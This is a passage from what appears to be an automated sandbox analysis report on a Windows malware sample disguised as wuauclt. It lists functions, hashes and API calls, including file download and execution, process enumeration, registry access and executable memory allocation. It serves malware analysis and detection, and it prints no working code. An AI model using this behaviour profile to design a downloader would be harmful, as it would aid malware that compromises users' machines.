                                                                            • Opcode ID: 4ddd04bc19eee49dddbff63bd050fb69c2f1bae6dbd96e986c565c5749236f46
                                                                            • Instruction ID: 4fc79d3f2b5b8faf063af9b8bc26cff02520aca8bab65447a439d837e7e270b0
                                                                            • Opcode Fuzzy Hash: 4ddd04bc19eee49dddbff63bd050fb69c2f1bae6dbd96e986c565c5749236f46
                                                                            • Instruction Fuzzy Hash: 2821C272904354EFEB224B14DC407BBF7A0EF88314F34686EF48A57281DA785D85CA54
                                                                            Function 00404412 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: db41b0ba3a44b8224a4d418b805d9062f5bccf6ef3d49d7edfc8f6e9fd2d226f
                                                                            • Instruction ID: a4e659a15bfe6cc6a5175c85437e059c15b529ad29c6638f01f64b8e280c5786
                                                                            • Opcode Fuzzy Hash: db41b0ba3a44b8224a4d418b805d9062f5bccf6ef3d49d7edfc8f6e9fd2d226f
                                                                            • Instruction Fuzzy Hash: 8BE0FEB2204209BFEB00DE8ADCC1DABB7ACFB4C654F804115BB1C97242D275AC608B71
                                                                            Function 00404414 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 8b228866068003d5a64e75c2e509e979b335083b2cdf08991ca5778dcb1b938b
                                                                            • Instruction ID: 1a50dcc7cdea4a8dd795a97503a1aea6df38831d2862f32125516eae5aa71f33
                                                                            • Opcode Fuzzy Hash: 8b228866068003d5a64e75c2e509e979b335083b2cdf08991ca5778dcb1b938b
                                                                            • Instruction Fuzzy Hash: 3BE0FEB2204209BBDB00DE8ADCC1DABB7ACFB4C654F804105BB1C972428275AC608B71
                                                                            Function 004047DC Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404540: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            • Process32First.KERNEL32(00000000,?), ref: 004047ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$FirstHandleModuleProcess32
                                                                            • String ID:
                                                                            • API String ID: 2774106396-0
                                                                            • Opcode ID: d93d91b8e38b99e0fec1aed6d2140be44b916721ca6624efbe62f0603cd51909
                                                                            • Instruction ID: a3f6bbae0d87f7b9787858b7dc97653b0fa36113f3f962383a2b83338c2990b6
                                                                            • Opcode Fuzzy Hash: d93d91b8e38b99e0fec1aed6d2140be44b916721ca6624efbe62f0603cd51909
                                                                            • Instruction Fuzzy Hash: 47C012A260122017CA1066F52C844C7474CC9851B631404B3B704E7141E7398C1151A4
                                                                            Function 004047FC Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404540: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            • Process32Next.KERNEL32(00000000,?), ref: 0040480D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModuleNextProcess32
                                                                            • String ID:
                                                                            • API String ID: 2237597116-0
                                                                            • Opcode ID: 7f6ee4ad62c472196961c1609a2b8dae34468c222124f6cea3b4daa9d1afbdd1
                                                                            • Instruction ID: 072edac3b3adf4cd748ced73bd5d3aecee52d318074062bb4efcac7800938936
                                                                            • Opcode Fuzzy Hash: 7f6ee4ad62c472196961c1609a2b8dae34468c222124f6cea3b4daa9d1afbdd1
                                                                            • Instruction Fuzzy Hash: 12C012A260122017CA1066F52D844C7474CC9C51B631444B3B704F7152E2398C105194
                                                                            Function 004047BC Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404540: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004047CD
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 2242398760-0
                                                                            • Opcode ID: fad7533437dbae3efdf639f17d82456d4a1287e93aada96dda02112028223706
                                                                            • Instruction ID: c40cfb2cff0e8543d494dcdfcbf93d461de1da01fd97da5991265f8cc755c822
                                                                            • Opcode Fuzzy Hash: fad7533437dbae3efdf639f17d82456d4a1287e93aada96dda02112028223706
                                                                            • Instruction Fuzzy Hash: EFC012A261122017CA1066F52C844C3579CC9891FA31404B3B704E7141E2398C105294
                                                                            Function 004042AA Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 004042C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID:
                                                                            • API String ID: 1964310414-0
                                                                            • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                            • Instruction ID: 42de1c329415a5983c08d079f819a82d79578491e5c84c113ccbfbe26003380b
                                                                            • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                            • Instruction Fuzzy Hash: 88D01273250248AFC700EEBDCC06DAB33DC9B68609B048429B918C7100D13DE9508B60
                                                                            Function 004042AC Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 004042C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID:
                                                                            • API String ID: 1964310414-0
                                                                            • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                            • Instruction ID: dbdaa29d8d5ab3acf8359d31fd046521d7a3cbff9559bf3fa2f5df482b1e4750
                                                                            • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                            • Instruction Fuzzy Hash: 01C01273150248ABC700EEA9CC06D9B33DC5B68609B048429B918C7100C13DE5508B60
                                                                            Function 00408494 Relevance: 1.5, APIs: 1, Instructions: 12networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                              • Part of subcall function 004080C8: DeleteUrlCacheEntry.WININET(00000000), ref: 0040810F
                                                                              • Part of subcall function 004080C8: DeleteFileA.KERNEL32(00000000,00000000,00000000,0040819E,?,00000000,00000000,?,004084B1,?,00000000,?,004084C7,000493E0), ref: 00408132
                                                                              • Part of subcall function 004080C8: URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00408168
                                                                              • Part of subcall function 004080C8: DeleteUrlCacheEntry.WININET(00000000), ref: 0040817E
                                                                              • Part of subcall function 004081E8: DeleteUrlCacheEntry.WININET(00000000), ref: 00408232
                                                                              • Part of subcall function 004081E8: DeleteFileA.KERNEL32(00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000,?,004084B6,?,00000000,?,004084C7), ref: 00408255
                                                                              • Part of subcall function 004081E8: URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040828B
                                                                              • Part of subcall function 004081E8: Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000), ref: 00408299
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntry$Download$ConnectedInternetSleepState
                                                                            • String ID:
                                                                            • API String ID: 1369373786-0
                                                                            • Opcode ID: dc49b30eb8cb48e74656dd8cc77bc0eff6cc65cfc1c0bbd4c620f9731a48f245
                                                                            • Instruction ID: 670bd1f1822fbab38942ef8954843972be358391e24c76c7ecbd6b66639f9f51
                                                                            • Opcode Fuzzy Hash: dc49b30eb8cb48e74656dd8cc77bc0eff6cc65cfc1c0bbd4c620f9731a48f245
                                                                            • Instruction Fuzzy Hash: 15C012A011820062D600BBA6AA02B5A668C0F80714F41443EB6C4A60C1EE3C8044822A
                                                                            Function 00404BFC Relevance: 1.5, APIs: 1, Instructions: 12registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,00000000,00404C35,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 601bb27103df1dd6ab7ae887f59132927187b2ef7b094d011fc2b20d749a3531
                                                                            • Instruction ID: c017c2d3cd7702cc40293f0c0b92f299cfcc0552216a4ded47398421e2e7ca9f
                                                                            • Opcode Fuzzy Hash: 601bb27103df1dd6ab7ae887f59132927187b2ef7b094d011fc2b20d749a3531
                                                                            • Instruction Fuzzy Hash: 49C08CF03092007BDA0CAA148C03F7E329C8780750F00442DB28096185C66054008129
                                                                            Function 004068D0 Relevance: 1.5, APIs: 1, Instructions: 11networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
                                                                              • Part of subcall function 00406728: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 004067D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectedExecuteInternetShellState
                                                                            • String ID:
                                                                            • API String ID: 3822808191-0
                                                                            • Opcode ID: 5fe85a0e7d98bcb115740b811f82c610ad9dcd17b5c26daa3db827d2b0b6e89f
                                                                            • Instruction ID: cb9ba5a357dbf17f807466452ced53c340c992696767b35d6928e3153f41e3a9
                                                                            • Opcode Fuzzy Hash: 5fe85a0e7d98bcb115740b811f82c610ad9dcd17b5c26daa3db827d2b0b6e89f
                                                                            • Instruction Fuzzy Hash: 41C08CB110820061D6007B62AD01B5A66CC8F80704F41483E7684E20C4EB3CC444922A
                                                                            Function 00439CC7 Relevance: 1.3, APIs: 1, Instructions: 45memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00020000,00001000,00000040,?,?,?,?,?,?,?,00000007,?,?,00439C51,?), ref: 00439D1B
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 1719246a0053cc99c24b234b1e179e3f801c697a2531001e2cc0710cff91ed1e
                                                                            • Instruction ID: 794ef5d78045ed4d742bdaeeac8ed0779eb977f76541356490a23fe8d5b0fb08
                                                                            • Opcode Fuzzy Hash: 1719246a0053cc99c24b234b1e179e3f801c697a2531001e2cc0710cff91ed1e
                                                                            • Instruction Fuzzy Hash: 3EF0B4B26493207AF124670AAC8BF973F5CDF85B75F00042AF64D5A1C1E4997C10C2BA
                                                                            Function 004381FA Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00020000,00001000,00000040,004381FA,004381FA,004381FA), ref: 00438265
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 43f065defaea95145b3ecdcf874f9926135ac585ebd2532a17b86c1669fef322
                                                                            • Instruction ID: cf7fc80abf0a610b938b0f6de2e472192636330f029e0b36f2c69517e1b1d411
                                                                            • Opcode Fuzzy Hash: 43f065defaea95145b3ecdcf874f9926135ac585ebd2532a17b86c1669fef322
                                                                            • Instruction Fuzzy Hash: E5018831A443189BDB359E29CC04BDAB7B1EB44750F2104ADF584B7281CAB4AE808E08
                                                                            Function 0040285C Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
